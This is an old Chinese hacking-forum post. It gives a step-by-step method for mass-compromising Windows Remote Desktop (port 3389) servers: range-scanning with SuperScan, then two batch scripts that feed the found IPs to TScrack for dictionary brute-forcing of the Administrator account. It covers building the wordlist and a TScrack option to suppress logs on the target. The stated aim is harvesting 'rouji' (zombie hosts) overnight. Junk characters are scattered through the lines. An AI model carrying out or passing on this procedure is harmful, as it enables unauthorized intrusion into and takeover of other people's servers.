|
作者:霜风 QQ:14226581 / K/ X, h, j: s2 N4 s1 ~& [
终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。$ G# c* X7 Q3 W% R; ]
这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下:
7 t0 H; f. J, D. @( e% x1 o5 u首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下:. J1 j1 o1 S1 p0 l
先打开superscan3如图1) ?/ {8 T' x1 L" P/ z
; _" J% |, D/ N此主题相关图片如下:4 F" t" [; B$ \' E5 ~/ g' {
# J) [) x; E/ S# U$ P
1 o! K3 ^' s# Z0 Z1 N. D! J接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图2+ r+ a, p1 V9 t+ \" g# {" |/ G0 E
2 ?6 c% A$ c; h8 |# f. W9 |此主题相关图片如下:' n8 H) w/ i$ e2 l6 [9 R0 J
6 F! C% ]" }/ K5 @+ N' y
! x$ P0 s7 m4 d# s
然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除.
) Q0 U+ D1 f+ C" E; s, a, o这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图31 ^7 t. W: H: M1 M' J( e! M }% l# Y
- h7 W) a) h/ E% Y; S+ ~1 v
此主题相关图片如下:1 ]5 c9 h* m# R# u$ y
+ g, j/ I5 m% F4 [+ M" i3 g; G5 A) V; N/ R! O# k A T1 _: q0 _5 \4 J
“|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。
0 g# A' H* L( _- j9 \9 x) H1 e D* z' ~3 z9 ?
此主题相关图片如下:
" ?" z" v& O/ K6 K/ D% Z) H
+ o C' _! s5 J1 g3 F9 r, s7 u0 M, R/ X接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5
( z: H; L6 Z; Z3 [
/ U% ~# R2 ~& d. M此主题相关图片如下:- I8 g, M+ H# A( o
, C0 T% Z ^2 u" N; r! N0 D
进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。
/ {' M2 M% _3 i6 @1 |: x/ R所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。
9 X! H ?3 Z3 N/ m5 B+ N; G8 i. ^4 ^- _TScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。) s8 `$ [& l1 m
此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。) P$ U u: ]) {# q, f
在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项:
; U! V% g$ N8 W* S6 f7 x-h : Print usage help and exit. K' g, T/ |$ r1 ]
-V : Print version info and exit
/ D6 j" A' B( N-s : Print chipher strenght info and exit) @$ B" P. S& h) R" g1 n# J
-b : Enable failed password beep, f* G( y8 w% `& A0 c# P
-t : Use two simultaneous connections [EXPERIMENTAL]0 U' [7 R# o( R9 Z
-N : Prevent System Log entries on targeted server
: t2 W% ]( e9 \2 v, h-U : Uninstall tscrack and remove components# X$ U m }' c" i1 a
-f <number> : Wordlist entry to start cracking with
' E! C" l! q h" `. E-F <delay> : Sampling Frequency (Delay between samples in ms)
) q9 t/ s4 U {* E! ~* i/ U-l <user> : Account name to use, defaults to Administrator2 z2 Y- t0 {) j/ E( P$ z
-w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted2 j9 y8 u: |, y
-p <password> : Use <password> to logon instead of wordlist/blank pass
/ t4 G; `& ^* v6 s! e-D <domain> : Specify domain to attempt logon to - B, p0 J- i/ Q5 G9 m, J! f" Z
3 T: t, R% a9 H' @
) t) j! Y% s" b我就帮忙翻译一下吧,翻译得不好可不要怪我啊:, V7 E- |1 e& ^. C
-h : 显示使用帮助然后退出. z( [; Y: P! \$ y: g
-V : 显示版本信息然后退出
/ I5 J- p! }: \-s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明)
8 T4 t0 f7 H( ]-b : 密码错误时发出声音0 A7 z$ r& h9 \* P/ M
-t : 同时发出多个连接,就是多线程。
6 S( I8 p H, J1 W-N : Prevent System Log entries on targeted server* ?6 g9 A( ]- B
-U : 卸载移除tscrack组件。$ D# b% N. [4 L# P) p+ w4 \
-f <number> : 使用-F后面的密码。
: _9 g# {. t" p: R-F <delay> : 间隔时间(频率)
" O' ?' R2 H$ r& c# u0 {-l <user> : 使用-L后面的用户名" G; [5 l' {& V, y
-w <wordlist> : 使用-W后面的字典
' A: U7 a& l, H" k9 X-p <password> : 使用-W后的密码
2 y% V+ ?/ z1 }' M2 ~' T. a6 h-D <domain> : 登陆主页面?3 r4 q4 j5 A! ^/ q
相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本:. D R/ C$ ^4 _+ {3 K
@if not exist IpcScan.txt goto noscan2 N' n' F+ j, A% r" H5 X+ z' |$ ~
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i- c5 Y# ]! x! ]2 K* s" X
:noscan
" x0 b; t6 L U4 s, A# U1 X6 C# G4 R& F@echo 3389.txt no find or scan faild  - L8 N$ H( ]. t: n3 z! F
这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)
+ ~2 }' W, F7 [0 R" n4 f8 A保存后把后错名改为BAT就可以了。
/ P0 |# p' ~9 c- E. w/ H还写一个BAT,名字为HACK.BAT,代码如下:0 I0 W1 B/ j+ j( d" X# @- |
@if not exist tscrack.exe goto noscan
) c* d& ]8 P$ |2 X4 c" y" ^@tscrack %1 -l administartor -w pass.dic >>rouji.txt6 A+ o! X' ^; r) ~. _9 o
:noscan7 w7 h0 A0 Y: X; w
@echo tscrack.exe no find or scan faild
- U1 Q9 H4 i' |这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC
' r5 E5 V. Y- _7 O2 ~制作方法如上。
/ F6 J; n1 P7 P0 Y0 k( q然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图6; n4 G4 x {' G1 _! L. }
' f% k4 s; v$ N0 h# G
此主题相关图片如下:2 |) W5 M X% x2 K
怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.% F* X! x6 S, F& v; Q/ ]
最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7
0 m8 g$ D3 v( j
) v% _* T- x% q8 g8 T' q* s7 k2 V4 K此主题相关图片如下:
/ U- @4 w( V0 ]- [* a8 f$ W* b' w/ i8 g; d
怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.
6 V! v3 ^0 t5 J# u: j3 B$ q& G1 T8 `最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~ | 
IP卡
狗仔卡
发表于 2004-10-6 09:51
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
